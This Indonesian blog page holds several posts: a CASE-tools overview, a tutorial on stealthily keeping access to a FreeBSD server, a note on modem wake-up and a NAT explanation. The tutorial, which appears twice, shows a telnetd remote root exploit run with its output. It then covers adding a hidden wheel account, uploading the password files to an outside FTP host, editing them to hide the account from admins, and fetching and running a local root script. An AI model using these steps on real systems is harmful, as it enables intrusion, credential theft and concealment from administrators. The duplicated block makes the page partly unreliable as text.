* Kepanjangannya Computer-Aided Software Engineering atau Computer-Assisted Software Engineering
*Perangkat lunak yang berguna bagi para pengembang dalam merencanakan, menganalisa, merancang, melakukan pemrograman, dan memelihara sistem sistem informasi
*Tujuan utama CASE dibentuk adalah untuk mengalihkan sejumlah beban yang biasanya dipikul oleh pengembang sistem kepada komputer
ന*
Perangkat CASE yang lengkap mengandung perangkat uppercase dan lowercase
Lowercase
* merupakan perangkat CASE yang berfungsi sebagai pembangkit kode (code generator), yakni menghasilkan kode program berdasarkan suatu spesifikasi rancangan
contoh aplikasi Lowercase
* febooti fileTweak Case 1.1
Ubah file / folder kasus. Anda dapat memodifikasi berkas kasus dengan mengubah ke huruf besar, huruf kecil, Title Case, kasus kalimat, toggle CASE, acak kasus. Ini dapat memproses satu file / folder serta subfolder pohon. Berdiri sendiri anggota (modul) dari febooti fileTweak.
* Batch Zip Toolkit V2.04
Zip batch Toolkit adalah pemenang penghargaan, semua dalam satu file kompresi paket yang memungkinkan Anda untuk kompres dan dekompresi file secara individu - dalam Toolkit Zip Batch batch.Although didasarkan sekitar format Zip yang populer, dalam kenyataan itu benar-benar mendukung 13 format kompresi yang berbeda, termasuk Lha , Gzip, BlakHole, Cab, Tar, Lzh, arj, Ace dan Toolkit Zip Rar.Batch juga dapat memampatkan file Anda secara individual melalui direktori (rekursif) menghemat waktu dan usaha. Jika Anda perlu membuat file extracting diri, menunjukkan Batch Tootkit Zip file Anda ingin mengkonversi dan klik tombol tunggal. Ini benar-benar adalah yang sederhana. File-file ini dapat dibagi di antara teman dan kolega Anda, bahkan jika mereka tidak memiliki Batch t Toolkit Zip terinstall pada Toolkit Zip machine.Batch mereka juga memiliki dibangun di utilitas konversi. Memungkinkan Anda memiliki 10 file dalam format RAR dan anda d ingin mengkonversi mereka ke format Zip, lagi-lagi Anda memilih file yang ingin Anda mengkonversi dan klik tombol 1. Dalam beberapa detik, file Anda akan converted.We juga mengerti bahwa Anda mungkin ingin Batch file Zip yang mungkin memiliki nama file yang tidak teratur, misalnya, jika Anda memiliki file folder penuh dengan kedua huruf besar dan huruf kecil nama-nama file yang tidak seragam , dengan menggunakan fasilitas ganti nama dalam Toolkit Zip Batch, Anda dapat di klik tombol, berganti nama mereka untuk huruf besar atau huruf kecil dalam beberapa detik, terus siap untuk consitent melihat arsip untuk CDR.
* Another Notepad 1.34
Jendela editor teks. Berikut adalah berguna editor teks dengan semua fitur yang nyaman Microsoft kiri keluar dari utilitas Windows Notepad. Hanya beberapa fitur: Urutkan baris teks alfabetis; Convert blok teks untuk semua huruf besar atau huruf kecil; Penggabungan dua file bersama-sama; WordStar perintah kunci; Smart tabs; Auto-lekukan; User-didefinisikan margin; Firman membungkus; Ubah font; load file 16MB.
* Excel change case in multiple cells to u 2.0
Mudah mengubah sel excel kasus dengan klik tombol! Pilih excel beberapa sel yang Anda ingin mengubah format untuk, dan voila! Hal ini dilakukan! Fitur utama: * Pilih sekelompok sel dari spreadsheet excel Anda untuk mengubah kasus untuk * Klik pada tombol untuk memilih huruf besar, huruf kecil, atau kasus yang layak (yaitu, huruf besar, dll). * Dan menikmati kemudahan penggunaan software ini untuk ms excel!
* LangOver 5.0
LangOver - Apakah baik untuk perangkat lunak ini, sih? Apakah Anda pernah mencoba mengetik dalam satu bahasa tetapi hasilnya lain? Annoying, eh?! Itu s karena layout keyboard berada di salah ll language.With LangOver Anda dapat mengubah teks Anda dengan cepat antara bahasa-bahasa. Gunakan F10 (Untuk campur-baur antara bahasa-bahasa )---------------------------------------- ------------ Cukup klik F10 - dan teks Anda akan dipasang! LangOver mendukung bahasa apa pun. Hal ini dapat mengkonversi dari APAPUN ke Bahasa INGGRIS, dan dari INGGRIS ke Bahasa APAPUN. * Gunakan SHIFT + F10 untuk mengkonversi huruf besar / huruf kecil teks: Gunakan ABCABC F6 (Untuk membalik teks )----------------------------- ------- Selain dapat membalikkan LangOver teks Anda: ABCCBA
Uppercase
* Dukungan yang tersedia berupa:
Perangkat pembuat diagram (diagramming tool). Perangkat ini berguna untuk membuat DFD (Data Flow Diagram)
Pembangkit layar dan laporan (screen and report generator). Perangkat ini dapat dipakai untuk membuat prototipe laporan dengan cara memasukkan kolom atau field data pada layar.
contoh aplikasi Uppercase
* Free StatusTitle Maker 6.1
Free StatusTitle Maker menciptakan kode JavaScript untuk menampilkan pesan dalam judul dan status bar. Anda dapat menggambarkan tujuan link dalam judul atau status bar bukannya menunjukkan URL yang terkait dengannya. Juga ada banyak efek disesuaikan termasuk: Huruf Besar Di seberang, Flash, mesin ketik huruf demi huruf dan seterusnya. Akhirnya, terdapat 19 efek untuk dikendalikan judul bar dan 19 efek untuk dikendalikan status bar.
* Yaldex StatusTitle Maker 5.0 5.1
Maker Yaldex StatusTitle menghasilkan kode JavaScript untuk menampilkan pesan dalam status atau judul bar. Sebagai contoh, Anda dapat menggambarkan tujuan link dalam status bar atau judul bukannya menunjukkan URL yang terkait dengannya. Juga ada banyak efek disesuaikan termasuk: Huruf Besar Di seberang, Flash, mesin ketik huruf demi huruf dan seterusnya. Akhirnya, terdapat 19 efek untuk dikontrol status bar dan 19 dikontrol efek untuk batang judul.
* KeyCleanse 1.0
KeyCleanse adalah kata kunci utama alat manajemen dan daftar bersih. Fitur-fiturnya termasuk menghapus duplikat, minimum dan maksimum menghapus kata-kata, kata-kata menghapus melebihi batas karakter, menyeret, menghitung, dan kata-kata untuk mengubah semua huruf besar, huruf kecil atau judul kasus. KeyCleanse menghapus kata kunci yang tidak memenuhi persyaratan Anda dan hanya meninggalkan kata kunci yang Anda butuhkan. KeyCleanse adalah aplikasi gratis.
* File Renamer Pro 2.0
File Renamer Pro adalah yang mudah digunakan File Renamer memungkinkan Anda untuk mengubah nama beberapa file dan folder sekaligus. Ini menawarkan berbagai cara untuk mengubah nama file, termasuk huruf besar, huruf kecil, mengubah nama ekstensi file, penyisipan, penghapusan, string pengganti, berurut mengubah nama dan Renamer more.File Pro dapat mengubah nama file MP3 yang didasarkan pada informasi tag ID3 (misalnya nama artis, judul dll ). Program ini memberikan preview file baru names.It mendukung drag dan drop.
* Yaldex StatusTitle Maker 6.1
Maker Yaldex StatusTitle menciptakan kode JavaScript untuk menampilkan pesan dalam judul dan status bar. Anda dapat menggambarkan tujuan link dalam judul atau status bar bukannya menunjukkan URL yang terkait dengannya. Juga ada banyak efek disesuaikan termasuk: Huruf Besar Di seberang, Flash, mesin ketik huruf demi huruf dan seterusnya. Akhirnya, terdapat 19 efek untuk dikendalikan judul bar dan 19 efek untuk dikendalikan status bar.
Mungkin itu yang saya ketahui tentang Case Tool
Terima Kasih
Read More..
Rabu, 28 Oktober 2009
Sabtu, 08 Agustus 2009
Login ke FreeBSD secara Siluman
Viva buat script kiddies, karena saya bukan hacker :P~, melainkan lamerz, pertama-tama jelas anda harus punya shell buat anda jadikan modal ngeroot server FreeBSD tersebut, terserah anda akan menggunakan exploits apa, yang jelas anda pasti lebih mengerti dari pada saya, saya kasih contoh pake remote exploit menggunakan telnetd 7350854.c
Ex :
[lee@linux .lee]$ ./bsd target.com
7350854 - x86/bsd telnetd remote root
by zip, lorian, smiler and scut.
check: PASSED, using 16mb mode
######################################
ok baby, times are rough, we send 16mb traffic to the remote telnet daemon process, it will spill badly. but then,
there is no other way, sorry...
## setting populators to populate heap address space
## number of setenvs (dots / network): 31500
## number of walks (percentage / cpu): 496140750
##
## the percentage is more realistic than the dots ;)
percent |-----------------------------------| ETA |
19.19% |......................... | 00:49:32 |
oke kita tunggu sampe dapet root
## sleeping for 10 seconds to let the process recover
## ok, you should now have a root shell
## as always, after hard times, there is a reward...
command: ÿý%id;uname -a;whoami
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 31(guest)
FreeBSD target.com 4.2-RELEASE FreeBSD 4.2-RELEASE #1: Sat Nov 25 10:13:58 CST 2000 root@target.com:/usr/src/sys/compile/MAIL i386
root
!LOL anda bisa tertawa girang anda sudah mendapatkan Root, sekarang anda siapkan jurus buat mengamankan shell FreeBSD baru anda ini, dan anda add user dulu.
/usr/sbin/pw adduser gue -g wheel -s /bin/tcsh -d /etc/.gue
Terus bikin home buat anda di shell nya
mkdir /etc/.gue
terus sekolahin tuh shell biar bisa baca tulis
/usr/sbin/chown gue.wheel -R /etc/.gue
chown: -R: No such file or directory
Wekz.!!! kok no such file , cuekin aja namanya juga lamerz sekarang kita bikin pass nya dulu
passwd gue
New password:gue1234
Retype new password:gue1234
passwd: updating the database...
passwd: done
Changing local password for gue.
okbaybeh !! sekarang anda telnet ke shell freebsd baru anda itu
FreeBSD/i386 (target.com) (ttyp3)
login: gue
Password:*****
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
FreeBSD 4.2-RELEASE (MAIL) #1: Sat Nov 25 10:13:58 CST 2000
Welcome to FreeBSD!
Before seeking technical support, please use the following resources:
o Security advisories and updated errata information for all releases are at http://www.FreeBSD.org/releases/ - always consult the ERRATA section for your release first as it's updated frequently.
o The Handbook and FAQ documents are at http://www.freebsd.org/ and, along with the mailing lists, can be searched by going to http://www.FreeBSD.org/search.html. If the doc distribution has been installed, they're also available formatted in /usr/share/doc.
If you still have a question or problem, please take the output of `uname -a', along with any relevant error messages, and email it as a question to the questions@FreeBSD.org mailing list. If you are unfamiliar with FreeBSD's directory layout, please refer to the hier(7) man page. If you are not familiar with man pages, type "man man".
You may also use `/stand/sysinstall' to re-enter the installation and configuration utility. Edit /etc/motd to change this login announcement.
>
nahh sekarang kita racik bumbunya, kita balik ke root tadi, kita liat file master.passwd sama passwd,
cat /etc/master.passwd
s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566: 1040::0: 0: teacher part-time: /home/professor/ACCT/ mhw:/usr/local/util/msman
gue:$1$MDoybd3Y$OBWMzMHYU8WJkRAU8hSP00: 6925:0::0:0: User &:/etc/.pupet:/bin/tcsh
ada entry baru di file tersebut, hemm admin bisa curiga neh, kita liat juga di file passwd
cat /etc/passwd
syscpa:*:1564:1040:teachers part-time 20020506:/home/professor/ACCT/syscpa:/usr/local/util/msman
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:*:6925:0:User &:/etc/.pupet:/bin/tcsh
fiiiuuuhhh ada juga, okies santee, kita ke folder /etc
cd /etc
hemm jadi gimana donkz ?... ya udah kita buka ftp, ( pake ftp account anda dimanahlah terserah anda )
ftp
open uhamka-student.net
uhamka-student.net <-= masukin login
Password:***** <-= masukin password
udah gitu loe kirim file master.passwd sama file passwd ke ftp account loe
put master.passwd
abis itu file passwd
put passwd
setelah itu anda ambil / DL file master.passwd sama file passwd tadi dari ftp anda tadi, terus anda edit, setelah itu anda buka master.passwd menggunakan notepad.
s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566:1040::0:0:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:$1$MDoybd3Y$OBWMzMHYU8WJkRAU8hSP00:6925: 0::0:0: User &:/etc/.pupet:/bin/tcsh <=-- ini anda hapus
jadi tinggal :
s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566: 1040::0:0: teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
terus file tersebut anda save
setelah itu anda buka satu file lagi passwd, sama seperti tadi anda hapus "entry" yang baru aja anda buat pass add user
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:*:6925:0:User &:/etc/.pupet:/bin/tcsh <-= loe hapus juga ini
jadi
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
setelah itu anda save
file master.passwd sama passwd di ftp account anda, anda hapus dan file master.passwd sama passwd yang sudah anda edit anda upload ke ftp account anda lagi, setelah itu anda hapus file asli yang anda root tadi
rm master.passwd
rm passwd
anda ganti sama file master.passwd dan passwd yang sudah anda edit dan sudah anda upload ke ftp account anda, terus anda kirim lagi master.passwd sama passwd hasil editan anda ke shell tadi
kita liat hasilnya
cat /etc/passwd
syscpa:*:1564:1040:teachers part-time 20020506:/home/professor/ACCT/syscpa:/usr/local/util/msman
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
upsss !! dah tidak ada, terus hilang dong account baru kita, hemmmz tidaklah kawan, coba anda telnet lagi pake user sama pass yang tadi anda buat, kita test
FreeBSD/i386 (target.com) (ttyp4)
login: gue
Password:
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
PUPET and AxAL At #cracxer IRC.DAl.net Welcome Guys Sorry for the admin <-= file motd-nya saya ganti
Fiuuuh masih bisa masuk, khan sudah di hapus ?? <-= jangan tanya saya, be 'coz saya khan cuma lamers, hehehehe, trus anda puas dengan hasil anda ini ngak khan..??, anda pasti ingin mendapetkan akses root, gampang saja anda tinggal cari local exploit untuk mendapatkan akses root, oke sekarang kita ambil script nya, jangan lupa root box anda tutup saja,dan anda menggunakan account baru, terus anda ambil scriptnya yang sudah anda siapkan di ftp account anda
ftp> open uhamka-student.net
Connected to uhamka-student.net.
220 ProFTPD 1.2.4 Server (AEI Web Sites) [216.52.166.48]
Name (uhamka-student.net:pupet): uhamka-student.net
331 Password required for uhamka-student.net.
Password:******
230 User uhamka-student.net logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get evelyne.sh
local: evelyne.sh remote: evelyne.sh
227 Entering Passive Mode (211,101,151,167,121,20)
150 Opening ASCII mode data connection for evelyne.sh (1023 bytes).
100% 1055 00:00 ETA
226 Transfer complete.
1055 bytes received in 1.00 seconds (1.03 KB/s)
ftp> bye
kalau sudah anda ambil scriptnya, anda racik deh, caranya:
mv evelyne.sh su
ganti chmod nya
chmod +x su
anda jalankan scriptnya
>./su
Please hit ctrl-c twice...
nah anda tekan CTRL + c ( 2 kali )
now login with user eric and password FLUE A COOK HOVE DOUR SKY
after you're logged in you can su to root with the same
password
Trying ::1...
Connected to localhost.
Escape character is '^]'.
FreeBSD/i386 (target.com) (ttyp4)
login:eric
pass :FLUE A COOK HOVE DOUR SKY
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
PUPET and AxAL At #cracxer IRC.DAl.net Welcome Guys Sorry for the admin
>su
s/key 97 de09623
Password:FLUE A COOK HOVE DOUR SKY
#id
uid=0(root) gid=0(root) groups=0(root), 2(kmem), 3(sys), 4(tty), 5(operator), 31(guest)
>
Nah asik khan, sekali lagi hidup lamerz and script kiddies, thanks to all my friend at #cracxer Irc.dal.net , #cracxer will be back, thanks sekali lagi buat AXAl yang dah mau ngasih opini dan nemenin saya bikin artikel ini, juga buat petualang, kaka-joe, pak-tani, notts, babah, maffias yang Lagi bobo, ERNESTO_CHE_GUEVARRA (temen buat ke dugem) heueheu VIVA #CRACXER
Daftar exploit.
bisa anda dapatkan di www.packetstormsecurity.org, www.neworder.box.sk
Tutor ini saya rasa masih banyak "kekurangan" dan perlu pembenahan lebih dalam dari para Sang Ahli, karena sekali lagi saya cuma seorang lamerz dan sangat lamerz
-Sebelumnya Terima kasih atas kritik dan sarannya dan untuk "Jasakom.com" yang sudah mempublikasikan Artikel dari "si L@mers ini" viva jasako
Read More..
Ex :
[lee@linux .lee]$ ./bsd target.com
7350854 - x86/bsd telnetd remote root
by zip, lorian, smiler and scut.
check: PASSED, using 16mb mode
######################################
ok baby, times are rough, we send 16mb traffic to the remote telnet daemon process, it will spill badly. but then,
there is no other way, sorry...
## setting populators to populate heap address space
## number of setenvs (dots / network): 31500
## number of walks (percentage / cpu): 496140750
##
## the percentage is more realistic than the dots ;)
percent |-----------------------------------| ETA |
19.19% |......................... | 00:49:32 |
oke kita tunggu sampe dapet root
## sleeping for 10 seconds to let the process recover
## ok, you should now have a root shell
## as always, after hard times, there is a reward...
command: ÿý%id;uname -a;whoami
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 31(guest)
FreeBSD target.com 4.2-RELEASE FreeBSD 4.2-RELEASE #1: Sat Nov 25 10:13:58 CST 2000 root@target.com:/usr/src/sys/compile/MAIL i386
root
!LOL anda bisa tertawa girang anda sudah mendapatkan Root, sekarang anda siapkan jurus buat mengamankan shell FreeBSD baru anda ini, dan anda add user dulu.
/usr/sbin/pw adduser gue -g wheel -s /bin/tcsh -d /etc/.gue
Terus bikin home buat anda di shell nya
mkdir /etc/.gue
terus sekolahin tuh shell biar bisa baca tulis
/usr/sbin/chown gue.wheel -R /etc/.gue
chown: -R: No such file or directory
Wekz.!!! kok no such file , cuekin aja namanya juga lamerz sekarang kita bikin pass nya dulu
passwd gue
New password:gue1234
Retype new password:gue1234
passwd: updating the database...
passwd: done
Changing local password for gue.
okbaybeh !! sekarang anda telnet ke shell freebsd baru anda itu
FreeBSD/i386 (target.com) (ttyp3)
login: gue
Password:*****
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
FreeBSD 4.2-RELEASE (MAIL) #1: Sat Nov 25 10:13:58 CST 2000
Welcome to FreeBSD!
Before seeking technical support, please use the following resources:
o Security advisories and updated errata information for all releases are at http://www.FreeBSD.org/releases/ - always consult the ERRATA section for your release first as it's updated frequently.
o The Handbook and FAQ documents are at http://www.freebsd.org/ and, along with the mailing lists, can be searched by going to http://www.FreeBSD.org/search.html. If the doc distribution has been installed, they're also available formatted in /usr/share/doc.
If you still have a question or problem, please take the output of `uname -a', along with any relevant error messages, and email it as a question to the questions@FreeBSD.org mailing list. If you are unfamiliar with FreeBSD's directory layout, please refer to the hier(7) man page. If you are not familiar with man pages, type "man man".
You may also use `/stand/sysinstall' to re-enter the installation and configuration utility. Edit /etc/motd to change this login announcement.
>
nahh sekarang kita racik bumbunya, kita balik ke root tadi, kita liat file master.passwd sama passwd,
cat /etc/master.passwd
s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566: 1040::0: 0: teacher part-time: /home/professor/ACCT/ mhw:/usr/local/util/msman
gue:$1$MDoybd3Y$OBWMzMHYU8WJkRAU8hSP00: 6925:0::0:0: User &:/etc/.pupet:/bin/tcsh
ada entry baru di file tersebut, hemm admin bisa curiga neh, kita liat juga di file passwd
cat /etc/passwd
syscpa:*:1564:1040:teachers part-time 20020506:/home/professor/ACCT/syscpa:/usr/local/util/msman
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:*:6925:0:User &:/etc/.pupet:/bin/tcsh
fiiiuuuhhh ada juga, okies santee, kita ke folder /etc
cd /etc
hemm jadi gimana donkz ?... ya udah kita buka ftp, ( pake ftp account anda dimanahlah terserah anda )
ftp
open uhamka-student.net
uhamka-student.net <-= masukin login
Password:***** <-= masukin password
udah gitu loe kirim file master.passwd sama file passwd ke ftp account loe
put master.passwd
abis itu file passwd
put passwd
setelah itu anda ambil / DL file master.passwd sama file passwd tadi dari ftp anda tadi, terus anda edit, setelah itu anda buka master.passwd menggunakan notepad.
s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566:1040::0:0:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:$1$MDoybd3Y$OBWMzMHYU8WJkRAU8hSP00:6925: 0::0:0: User &:/etc/.pupet:/bin/tcsh <=-- ini anda hapus
jadi tinggal :
s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566: 1040::0:0: teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
terus file tersebut anda save
setelah itu anda buka satu file lagi passwd, sama seperti tadi anda hapus "entry" yang baru aja anda buat pass add user
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:*:6925:0:User &:/etc/.pupet:/bin/tcsh <-= loe hapus juga ini
jadi
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
setelah itu anda save
file master.passwd sama passwd di ftp account anda, anda hapus dan file master.passwd sama passwd yang sudah anda edit anda upload ke ftp account anda lagi, setelah itu anda hapus file asli yang anda root tadi
rm master.passwd
rm passwd
anda ganti sama file master.passwd dan passwd yang sudah anda edit dan sudah anda upload ke ftp account anda, terus anda kirim lagi master.passwd sama passwd hasil editan anda ke shell tadi
kita liat hasilnya
cat /etc/passwd
syscpa:*:1564:1040:teachers part-time 20020506:/home/professor/ACCT/syscpa:/usr/local/util/msman
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
upsss !! dah tidak ada, terus hilang dong account baru kita, hemmmz tidaklah kawan, coba anda telnet lagi pake user sama pass yang tadi anda buat, kita test
FreeBSD/i386 (target.com) (ttyp4)
login: gue
Password:
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
PUPET and AxAL At #cracxer IRC.DAl.net Welcome Guys Sorry for the admin <-= file motd-nya saya ganti
Fiuuuh masih bisa masuk, khan sudah di hapus ?? <-= jangan tanya saya, be 'coz saya khan cuma lamers, hehehehe, trus anda puas dengan hasil anda ini ngak khan..??, anda pasti ingin mendapetkan akses root, gampang saja anda tinggal cari local exploit untuk mendapatkan akses root, oke sekarang kita ambil script nya, jangan lupa root box anda tutup saja,dan anda menggunakan account baru, terus anda ambil scriptnya yang sudah anda siapkan di ftp account anda
ftp> open uhamka-student.net
Connected to uhamka-student.net.
220 ProFTPD 1.2.4 Server (AEI Web Sites) [216.52.166.48]
Name (uhamka-student.net:pupet): uhamka-student.net
331 Password required for uhamka-student.net.
Password:******
230 User uhamka-student.net logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get evelyne.sh
local: evelyne.sh remote: evelyne.sh
227 Entering Passive Mode (211,101,151,167,121,20)
150 Opening ASCII mode data connection for evelyne.sh (1023 bytes).
100% 1055 00:00 ETA
226 Transfer complete.
1055 bytes received in 1.00 seconds (1.03 KB/s)
ftp> bye
kalau sudah anda ambil scriptnya, anda racik deh, caranya:
mv evelyne.sh su
ganti chmod nya
chmod +x su
anda jalankan scriptnya
>./su
Please hit ctrl-c twice...
nah anda tekan CTRL + c ( 2 kali )
now login with user eric and password FLUE A COOK HOVE DOUR SKY
after you're logged in you can su to root with the same
password
Trying ::1...
Connected to localhost.
Escape character is '^]'.
FreeBSD/i386 (target.com) (ttyp4)
login:eric
pass :FLUE A COOK HOVE DOUR SKY
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
PUPET and AxAL At #cracxer IRC.DAl.net Welcome Guys Sorry for the admin
>su
s/key 97 de09623
Password:FLUE A COOK HOVE DOUR SKY
#id
uid=0(root) gid=0(root) groups=0(root), 2(kmem), 3(sys), 4(tty), 5(operator), 31(guest)
>
Nah asik khan, sekali lagi hidup lamerz and script kiddies, thanks to all my friend at #cracxer Irc.dal.net , #cracxer will be back, thanks sekali lagi buat AXAl yang dah mau ngasih opini dan nemenin saya bikin artikel ini, juga buat petualang, kaka-joe, pak-tani, notts, babah, maffias yang Lagi bobo, ERNESTO_CHE_GUEVARRA (temen buat ke dugem) heueheu VIVA #CRACXER
Daftar exploit.
bisa anda dapatkan di www.packetstormsecurity.org, www.neworder.box.sk
Tutor ini saya rasa masih banyak "kekurangan" dan perlu pembenahan lebih dalam dari para Sang Ahli, karena sekali lagi saya cuma seorang lamerz dan sangat lamerz
-Sebelumnya Terima kasih atas kritik dan sarannya dan untuk "Jasakom.com" yang sudah mempublikasikan Artikel dari "si L@mers ini" viva jasako
Read More..
Cara Menghidupkan Komputer Dengan Remote Area
Anda ingin menghidupkan PC anda dirumah secara otomatis dari kantor atau tempat lain. Hal ini cukup mudah, hanya saja PC anda harus memakai main board P2AB dan terhubung dengan modem apa saja. Dan yg lebih penting lagi modem anda terhubung ke PC dan ke line telpon.
Hubungi no telp tsb yg menghubungkan PC anda dengan modem dari tempat lain dan TA DA.......
PC anda akan segera hidup (waken up from death), hal ini dapat anda manfaatkan dengan fungsi software penerima fax pada PC anda yg dapat di pasang pada startup.
Perlu anda ketahui bahwa hal ini terjadi adalah dari setingan main board tsb.
Read More..
Hubungi no telp tsb yg menghubungkan PC anda dengan modem dari tempat lain dan TA DA.......
PC anda akan segera hidup (waken up from death), hal ini dapat anda manfaatkan dengan fungsi software penerima fax pada PC anda yg dapat di pasang pada startup.
Perlu anda ketahui bahwa hal ini terjadi adalah dari setingan main board tsb.
Read More..
Konfigurasi Router NAT pada windows 2000 server
Network Address Translation (NAT) adalah suatu teknik untuk mengubah suatu IP address ke IP address yg lain. Hal ini bisa dikarenakan karena di jaringan kita mengunakan network address yg disebut private address space di RFC 1918, yaitu:
10.0.0.0 - 10.255.255.255 (10/8 prefix)
172.16.0.0 - 172.31.255.255 (172.16/12 prefix)
192.168.0.0 - 192.168.255.255 (192.168/16 prefix)
Dan karena ini adalah private address, jaringan kita tentunya tidak dapat berkomunikasi dgn jaringan lain di Internet, karena semua host yg ingin terkoneksi di Internet harus menggunakan global atau public IP address. Untuk ini kita perlu men-translate IP address kita yg private menjadi public IP address.
Alasan lain untuk menggunakan NAT adalah security. Kita bisa men-translate seluruh jaringan kita (missal 254 PC) menjadi 1 public IP. Teknik ini disebut many-to-one NAT atau biasa disebut Port Address Translation (PAT). Teknik ini sangat bermanfaat jika kita menginginkan user di jaringan kita untuk meng-inisiasi koneksi ke Internet (browsing internet atau mengirim email misalnya), tapi kita tidak menginginkan host dari Internet untk meng-inisiasi koneksi ke PC user kita.
Host dari Internet tidak bisa meng-inisiasi koneksi ke internal host kita karena hanya ada 1 public IP address yg terlihat di jaringan kita, sedangkan jumlah PC yg sebenarnya ada lebih dari 1. Tentunya jika PC kita yg meng-inisiasi, maka reply atau return packet akan bisa
kembali karena device yg kita gunakan untuk melakukan NAT, akan memiliki mapping table dari NAT yg terjadi di jaringan.
Untuk kasus one-to-one NAT, dimana 1 private IP akan di-translate menjadi 1 global IP, maka mapping nya akan spt berikut:
Router#sh ip nat tra
Pro Inside global Inside local Outside local Outside global
— 195.1.134.1 192.168.1.1 — —
— 195.1.134.2 192.168.1.2 — —
Dalam contoh ini, IP private 192.168.1.1 di-translate ke public IP 195.1.134.1, IP private 192.168.1.2 di-translate ke public IP 195.1.134.2 dst.
Inside local adalah terminologi utk real IP address PC di jaringan kita, sedangkan Inside Global adalah public IP address yg kita gunakan untuk men-translasi real IP address tsb.
Outside local adalah local IP address dari tujuan kita sebagaimana kita melihatnya dari jaringan kita. Sedangkan Outside global adalah global IP address dari tujuan kita yg terlihat di Internet.
Ini bermanfaat utk destination based NAT, sbg contoh sbg berikut:
Ada server di Internet dgn global IP address 11.11.11.11, tapi kita ingin semua users di jaringan kita utk melihat server tsb sbg 192.168.1.11
Maka kita bisa melakukan destination based NAT, dgn outside local adalah 192.168.1.11 dan outside global, IP address tujuan yg sebenernya, adalah 11.11.11.11.
Jika kita tidak melakukan destination based NAT, maka outside local dan outside global dari tujuan kita akan sama, yaitu public IP tujuan yg sebenernya, dan ini bisa dilihat di contoh mapping PAT.
Untuk contoh many-to-one NAT atau PAT, dimana banyak real IP dari PC kita di-translate menjadi 1 public IP, maka contoh mapping nya sbg berikut:
Router#sh ip nat tra
Pro Inside global Inside local Outside local Outside global
tcp 195.1.134.4:12338 192.168.1.3:12338 33.33.33.33:23 33.33.33.33:23
tcp 195.1.134.4:12337 192.168.1.2:12337 22.22.22.22:23 22.22.22.22:23
Dalam contoh ini, kita melakukan telnet (destination tcp port 23) ke remote host 22.22.22.22
dari private IP 192.168.1.2, dan telnet ke remote host 33.33.33.33 dari private IP 192.168.1.3.
Kita bisa lihat bahwa ke-2 private IP kita di-translate ke public IP yg sama, yaitu 195.1.134.4. Yg membedakan adalah source port yg digunakan di public IP.
Jadi di mapping ini terlihat bahwa koneksi dari 192.168.1.2 di map ke 195.1.134.4 port 12337, sedangkan koneksi dari 192.168.1.3 di map ke 195.1.134.4 port 12338.
Dgn adanya mapping ini, remote host 22.22.22.22 ketika mengirimkan paket reply (ingat di TCP/IP reply dari remote host destination portnya ditujukan ke source port dari host kita), akan mengirimkan paket ke 195.1.134.4 port 12337. Sedangkan reply packet dari 33.33.33.33 kan ke 195.1.134.4 port 12338.
